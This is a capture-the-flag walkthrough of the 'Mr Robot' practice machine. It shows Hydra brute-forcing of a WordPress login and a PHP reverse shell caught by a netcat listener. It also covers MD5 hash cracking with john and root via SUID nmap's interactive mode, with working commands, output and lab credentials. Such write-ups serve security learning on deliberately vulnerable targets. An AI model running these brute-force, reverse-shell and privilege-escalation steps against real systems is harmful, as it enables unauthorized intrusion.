🎩Mr Robot

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

1.Reconnaisance

1.1 Nmap

Using nmap to scan and identify open ports and services

nmap -sC -sV -Pn 10.10.20.163                                                  root@j0zack
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-06 18:09 IST
Nmap scan report for 10.10.20.163
Host is up (0.17s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache
443/tcp open   ssl/http Apache httpd
|_http-title: Site doesnt have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-server-header: Apache

Webpage

Navigating to the webpage, we get a cool interactive shell-like environment with references to the series Mr Robot. Really fun to play with this and explore the given commands to find more references to the show.

2. Scanning

2.1 Gobuster

Using Gobuster to brute-force directories.

gobuster dir -u http://10.10.20.163 -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.20.163
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/06 18:30:57 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 213]
/.htaccess            (Status: 403) [Size: 218]
/.htpasswd            (Status: 403) [Size: 218]
/0                    (Status: 301) [Size: 0] [--> http://10.10.20.163/0/]
/admin                (Status: 301) [Size: 234] [--> http://10.10.20.163/admin/]
/atom                 (Status: 301) [Size: 0] [--> http://10.10.20.163/feed/atom/]
/audio                (Status: 301) [Size: 234] [--> http://10.10.20.163/audio/]  
/blog                 (Status: 301) [Size: 233] [--> http://10.10.20.163/blog/]   
/css                  (Status: 301) [Size: 232] [--> http://10.10.20.163/css/]    
/dashboard            (Status: 302) [Size: 0] [--> http://10.10.20.163/wp-admin/] 
/favicon.ico          (Status: 200) [Size: 0]                                     
/feed                 (Status: 301) [Size: 0] [--> http://10.10.20.163/feed/]     
/images               (Status: 301) [Size: 235] [--> http://10.10.20.163/images/] 
/Image                (Status: 301) [Size: 0] [--> http://10.10.20.163/Image/]    
/image                (Status: 301) [Size: 0] [--> http://10.10.20.163/image/]    
/index.html           (Status: 200) [Size: 1077]                                  
/index.php            (Status: 301) [Size: 0] [--> http://10.10.20.163/]          
/intro                (Status: 200) [Size: 516314]                                
/js                   (Status: 301) [Size: 231] [--> http://10.10.20.163/js/]     
/license              (Status: 200) [Size: 309]                                   
/login                (Status: 302) [Size: 0] [--> http://10.10.20.163/wp-login.php]
/page1                (Status: 301) [Size: 0] [--> http://10.10.20.163/]            
/phpmyadmin           (Status: 403) [Size: 94]                                      
/readme               (Status: 200) [Size: 64]                                      
/rdf                  (Status: 301) [Size: 0] [--> http://10.10.20.163/feed/rdf/]   
/robots               (Status: 200) [Size: 41]                                      
/robots.txt           (Status: 200) [Size: 41]                                      
/rss                  (Status: 301) [Size: 0] [--> http://10.10.20.163/feed/]       
/rss2                 (Status: 301) [Size: 0] [--> http://10.10.20.163/feed/]       
/sitemap              (Status: 200) [Size: 0]                                       
/sitemap.xml          (Status: 200) [Size: 0]                                       
/video                (Status: 301) [Size: 234] [--> http://10.10.20.163/video/]    
/wp-admin             (Status: 301) [Size: 237] [--> http://10.10.20.163/wp-admin/] 
/wp-content           (Status: 301) [Size: 239] [--> http://10.10.20.163/wp-content/]
/wp-includes          (Status: 301) [Size: 240] [--> http://10.10.20.163/wp-includes/]
/wp-cron              (Status: 200) [Size: 0]                                         
/wp-config            (Status: 200) [Size: 0]                                         
/wp-load              (Status: 200) [Size: 0]                                         
/wp-login             (Status: 200) [Size: 2664]                                      
/wp-links-opml        (Status: 200) [Size: 227]                                       
/wp-mail              (Status: 500) [Size: 3064]                                      
/wp-settings          (Status: 500) [Size: 0]                                         
/wp-signup            (Status: 302) [Size: 0] [--> http://10.10.20.163/wp-login.php?action=register]
/xmlrpc               (Status: 405) [Size: 42]                                                      
/xmlrpc.php           (Status: 405) [Size: 42]

We see a lot of directories and from the list we can find out that it is a WordPress site. We also see /robots.txt which might contain some interesting folders

`/robots.txt`

Navigating to robots.txt

We get two new directories fsocity.dic and key-1-of-3.txt

`/fsocity.dic`

We get a dictionary file, possibly useful for brute-forcing later on

Key 1 : http://10.10.20.163/key-1-of-3.txt

3. Gaining Access

In order to login to the /wp-login.php, we need admin credentials sop that we can upload our reverse shell and gain access to the box.

For every wrong username, we find the we get an error Invalid username
Further inspecting the request in burpsuite, we can see that the username and password values are stored in variables log and pwd and sent to the server respectively

3.2 Hydra

We can use hydra and the corresponding error messages along with the fsocity.dic file wordlist to brute-force username and password.
The wordlist contains over 850000 words. In order to save time, we can filter repeats from fsocity.dic and save the filtered (and much smaller) list to fsocity_filtered.dic which reduces the number of words to just under 11500

wc -l fsocity.dic                                                              
858160 fsocity.dic

sort fsocity.dic | uniq | wc -l                                                
11451 

sort fsocity.dic | uniq > fsocity_filtered.dic

Using hydra and the error message, we can brute-force the username with fsocity_filtered.dic wordlist and by keeping the password static(In this instance as test)

hydra -I -L fsocity_filtered.dic -p test 10.10.20.163 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username" -t 30
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-07 19:39:02
[DATA] max 30 tasks per 1 server, overall 30 tasks, 11452 login tries (l:11452/p:1), ~382 tries per task
[DATA] attacking http-post-form://10.10.20.163:80/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username
[STATUS] 210.00 tries/min, 210 tries in 00:01h, 11242 to do in 00:54h, 30 active
[STATUS] 298.67 tries/min, 896 tries in 00:03h, 10556 to do in 00:36h, 30 active
[STATUS] 236.00 tries/min, 1652 tries in 00:07h, 9800 to do in 00:42h, 30 active
[STATUS] 211.40 tries/min, 3171 tries in 00:15h, 8281 to do in 00:40h, 30 active
[80][http-post-form] host: 10.10.20.163   login: elliot   password: test
[80][http-post-form] host: 10.10.20.163   login: Elliot   password: test
[80][http-post-form] host: 10.10.20.163   login: ELLIOT   password: test

We get the username Elliot

Now using the username, we try to login again, and get another error he password you entered for the username Elliot is incorrect

With this error message, we repeat the brute-forcing attack on the password with fsocity_filtered.dic w3ordlist, this time using Elliot as the username.

hydra -l Elliot -P fsocity_filtered.dic 10.10.20.163 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username" -t 30 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-07 21:19:18
[DATA] max 30 tasks per 1 server, overall 30 tasks, 11452 login tries (l:1/p:11452), ~382 tries per task
[DATA] attacking http-post-form://10.10.20.163:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username
[STATUS] 448.00 tries/min, 448 tries in 00:01h, 11004 to do in 00:25h, 30 active
[STATUS] 319.33 tries/min, 958 tries in 00:03h, 10494 to do in 00:33h, 30 active
[STATUS] 238.00 tries/min, 1666 tries in 00:07h, 9786 to do in 00:42h, 30 active
[STATUS] 204.87 tries/min, 3073 tries in 00:15h, 8379 to do in 00:41h, 30 active
[80][http-post-form] host: 10.10.20.163 login: Elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-07 21:49:18

We get the login credentials, Elliot : ER28-0652

3.3 Reverse Shell

Login in to the portal, we can upload the php -reverse-shell from pentestmonkey in Appearance > Editor > Header (make sure to change the IP address)

Starting netcat and executing the reverse shell to get a connection

nc -lvnp 1234                                                                  
listening on [any] 1234 ...
connect to [10.11.66.165] from (UNKNOWN) [10.10.164.107] 40881
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 13:13:05 up 8 min,  0 users,  load average: 0.00, 0.05, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: cant access tty; job control turned off

Stabilizing the shell

$ python -c 'import pty;pty.spawn("/bin/bash")'

daemon@linux:/$ ^Z
[1]  + 2689 suspended  nc -lvnp 1234

stty raw -echo;fg                                                       
[1]  + 2689 continued  nc -lvnp 1234
                                    reset

Using find to serch for any file names starting with key-

daemon@linux:/$ find / -type f -name key-* 2>/dev/null

/usr/src/linux-headers-3.13.0-55/include/linux/key-type.h
/opt/bitnami/apps/wordpress/htdocs/key-1-of-3.txt
/home/robot/key-2-of-3.txt
/proc/key-users

We get a hit for key-2-of-3.txt located in the home directory of user robot

daemon@linux:/$ cd /home/robot/

daemon@linux:/home/robot$ ls
key-2-of-3.txt	password.raw-md5

daemon@linux:/home/robot$ cat key-2-of-3.txt 
cat: key-2-of-3.txt: Permission denied

We do not have the permission to access the key as the current user, but we do get access to user robot's md5 password hash

daemon@linux:/home/robot$ cat password.raw-md5 
robot:c3fcd3d76192e4007dfb496cca67e13b

3.4 John

Saving the md5 hash to a file name raw-md5.txt in the attacker machine

echo 'c3fcd3d76192e4007dfb496cca67e13b' > raw-md5.txt

Using john to crack the password of robot

john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 raw-md5.txt

Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=3

Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefghijklmnopqrstuvwxyz (?)

1g 0:00:00:00 DONE (2022-04-10 18:59) 9.090g/s 368290p/s 368290c/s 368290C/s bonjour1..123092
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

We get the credentials robot : abcdefghijklmnopqrstuvwxyz

su robot
Password: 

robot@linux:~$ cd /home/robot 
robot@linux:~$ cat key-2-of-3.txt

4.Privilege Escalation

Finding any SUID files for privilege escalation

robot@linux:~$ find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

We can see that SUID is set on /usr/local/bin/nmap
Escalating permissions with nmap with the help of gtfobins.

nmap --interactive 

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help

nmap> !sh

whoami
root

Reading key-3-of-3.txt

ls /root/	
firstboot_done	key-3-of-3.txt

cat /root/key-3-of-3.txt

PreviousJack-of-All-Trades NextOverpass

Last updated 3 years ago

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

1.Reconnaisance

1.1 Nmap

Webpage

2. Scanning

2.1 Gobuster

/robots.txt

/fsocity.dic

3. Gaining Access

3.1 wp-login

3.2 Hydra

3.3 Reverse Shell

3.4 John

4.Privilege Escalation

`/robots.txt`

`/fsocity.dic`